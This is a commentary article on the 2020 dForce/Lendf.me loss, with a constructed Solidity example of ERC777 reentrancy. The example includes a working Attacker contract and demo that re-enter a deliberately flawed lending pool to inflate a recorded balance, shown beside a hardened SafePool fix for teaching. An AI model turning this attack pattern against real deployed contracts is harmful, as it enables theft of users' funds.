DForce Suffered $25 Million Loss in Attack

  • Commentary
  • April 25, 2020

The China-based decentralized finance platform dForce suffered an attack on Sunday, April 19th, with losses amounting to $25 million, almost the entire balance of assets locked in its yield-on-deposit protocol, Lendf.me. Although subsequent reporting indicates that the attacker returned the majority of those funds, the dForce team has permanently disabled the Lendf.me smart contracts and the protocol’s future is unclear. Members of the decentralized finance (DeFi) community have speculated that the attack stemmed from the protocol’s integration with imBTC, an Ethereum-based token pegged 1:1 to BTC. The working theory is that imBTC’s use of the ERC777 token standard, whose transfer hooks hand control to the sending contract in the middle of a token transfer, allowed the attacker to re-enter the protocol and withdraw funds before the smart contract had written its updated balance, so that the funds could be extracted at almost no cost.

dForce was the subject of a $1.5 million investment from the blockchain and cryptoasset investment firm Multicoin Capital, announced just five days prior; the firm described the platform as a “super-network”, lauding its focus on user experience and what it saw as a compelling suite of complementary protocols. The platform has, however, been subject to robust criticism, with Compound CEO Robert Leshner claiming that it copied Compound’s smart contracts without acknowledgment and stating: “If a project doesn’t have the expertise to develop its own smart contracts, and instead steals and redeploys somebody else’s copyrighted code, it’s a sign that they don’t have the capacity or intention to consider security.”
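
The reentrancy pattern the working theory describes, as an added illustration that is not Lendf.me’s, imBTC’s or dForce’s code: a constructed ERC777-style token whose tokensToSend hook hands control to the depositor mid-transfer, a lending pool whose supply() reads the depositor’s balance, makes the external token call, and only then writes the balance back, and an attacker contract whose hook re-enters withdraw() inside that window. All contract and function names are assumed for the example, and the token simplifies ERC777 by letting holders opt in to the hook directly rather than through the ERC1820 registry. SafePool shows the corrected ordering beside the weak one.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Constructed illustration with assumed names (not Lendf.me's, imBTC's or dForce's code): an ERC777-style
// send hook re-entering a pool whose supply() writes its bookkeeping only after the external token call.
interface ITokensSender {   // ERC777 hook, invoked on the holder before its tokens move
    function tokensToSend(address operator, address from, address to, uint256 amount,
                          bytes calldata userData, bytes calldata operatorData) external;
}
interface IPool {
    function supply(uint256 amount) external;
    function withdraw(uint256 amount) external;
    function supplied(address user) external view returns (uint256);
}

// Minimal ERC777-like token. Real ERC777 resolves hook implementers through the ERC1820 registry;
// here a holder opts in with registerSendHook(), a simplification that keeps the example self-contained.
contract HookedToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    mapping(address => bool) public hasSendHook;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }  // demo only, unguarded
    function registerSendHook() external { hasSendHook[msg.sender] = true; }
    function approve(address spender, uint256 amount) external returns (bool) { allowance[msg.sender][spender] = amount; return true; }
    function transfer(address to, uint256 amount) external returns (bool) { _move(msg.sender, msg.sender, to, amount); return true; }
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        allowance[from][msg.sender] -= amount;   // checked math: reverts if not approved
        _move(msg.sender, from, to, amount); return true;
    }
    function _move(address operator, address from, address to, uint256 amount) internal {
        // Control leaves the token here, before any balance has changed: the holder may re-enter the pool.
        if (hasSendHook[from]) ITokensSender(from).tokensToSend(operator, from, to, amount, "", "");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
    }
}

// Vulnerable: read, external call, then write the cached value back; a withdrawal made during the call is overwritten.
contract VulnerablePool {
    HookedToken public immutable token;
    mapping(address => uint256) public supplied;
    constructor(HookedToken t) { token = t; }
    function supply(uint256 amount) external {
        uint256 cached = supplied[msg.sender];                            // 1. read
        require(token.transferFrom(msg.sender, address(this), amount));  // 2. interaction: hook fires
        supplied[msg.sender] = cached + amount;                           // 3. stale write
    }
    function withdraw(uint256 amount) external {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount));
    }
}

// Hardened: checks-effects-interactions order plus a reentrancy guard; a nested withdraw() from the hook reverts.
contract SafePool {
    HookedToken public immutable token;
    mapping(address => uint256) public supplied;
    bool private locked;
    modifier nonReentrant() { require(!locked, "reentrant"); locked = true; _; locked = false; }
    constructor(HookedToken t) { token = t; }
    function supply(uint256 amount) external nonReentrant {
        supplied[msg.sender] += amount;                                   // effect first
        require(token.transferFrom(msg.sender, address(this), amount));  // interaction last
    }
    function withdraw(uint256 amount) external nonReentrant {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount));
    }
}

// Attacker: deposits `seed` honestly, then 1 more; during that second transfer the hook withdraws `seed`,
// yet supply() records seed + 1 regardless. Repeating the step doubles the phantom balance each round.
contract Attacker is ITokensSender {
    HookedToken private immutable token;
    IPool private immutable pool;
    bool private armed;
    constructor(HookedToken t, IPool p) { token = t; pool = p; t.registerSendHook(); }
    function attack(uint256 seed) external {
        token.approve(address(pool), type(uint256).max);
        pool.supply(seed);   // honest deposit: pool holds `seed` and records `seed`
        armed = true;
        pool.supply(1);      // hook re-enters withdraw(seed) before the stale write lands
    }
    function tokensToSend(address, address, address to, uint256, bytes calldata, bytes calldata) external override {
        if (msg.sender == address(token) && to == address(pool) && armed) {
            armed = false;                                 // never recurse into ourselves
            pool.withdraw(pool.supplied(address(this)));   // tokens come back and the recorded balance hits 0,
        }                                                  // then supply() overwrites it with seed + 1
    }
}

// Demo.run() returns (101, 1, 99): a recorded claim of 101 against a pool holding 1 token, attacker still holding 99.
contract Demo {
    function run() external returns (uint256 recorded, uint256 pooled, uint256 held) {
        HookedToken token = new HookedToken();
        VulnerablePool pool = new VulnerablePool(token);
        Attacker a = new Attacker(token, IPool(address(pool)));
        token.mint(address(a), 100); a.attack(100);
        return (pool.supplied(address(a)), token.balanceOf(address(pool)), token.balanceOf(address(a)));
    }
}
```

Deploy Demo and call run() in Remix or any 0.8.x toolchain: the attacker, having genuinely parted with a single token, holds a recorded claim of 101 against a pool that contains one, and each further supply(1) doubles that claim, which is what makes draining a pool’s other assets cheap. Point the same Attacker at `IPool(address(new SafePool(token)))` instead and the nested withdraw() reverts with "reentrant", taking the whole deposit transaction with it; the effects-before-interactions ordering alone already removes the stale write, and the guard closes the remaining re-entry paths.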

The dForce attack is a particularly illustrative example of the vulnerability of many DeFi protocols, and perhaps of Ethereum DeFi protocols especially. Critics of the Ethereum network point to its supposedly larger attack surface relative to other smart-contracting networks, specifically its Turing-completeness, its reliance on a compiler, and its lack of formal verification. It has been suggested that the dForce attack, if it was indeed due to a weakness introduced through imBTC, was similar in nature to the infamous 2016 DAO attack, itself a reentrancy exploit, which ultimately led to the contentious Ethereum/Ethereum Classic hard fork. While such criticisms may be too general and perhaps unfair to the Ethereum ecosystem, and to DeFi in particular, the dForce example does at least highlight the necessity for such protocols to undergo extremely robust internal and third-party security audits, and the requirement for teams to understand the intricacies of their own codebases, including the behaviour of every token standard they integrate. Ultimately, however, no audit is fool-proof and, with the DeFi sector collectively holding over $750 million worth of assets, there remain serious questions about the security of these protocols, especially since a deployed contract is immutable and cannot be patched in place.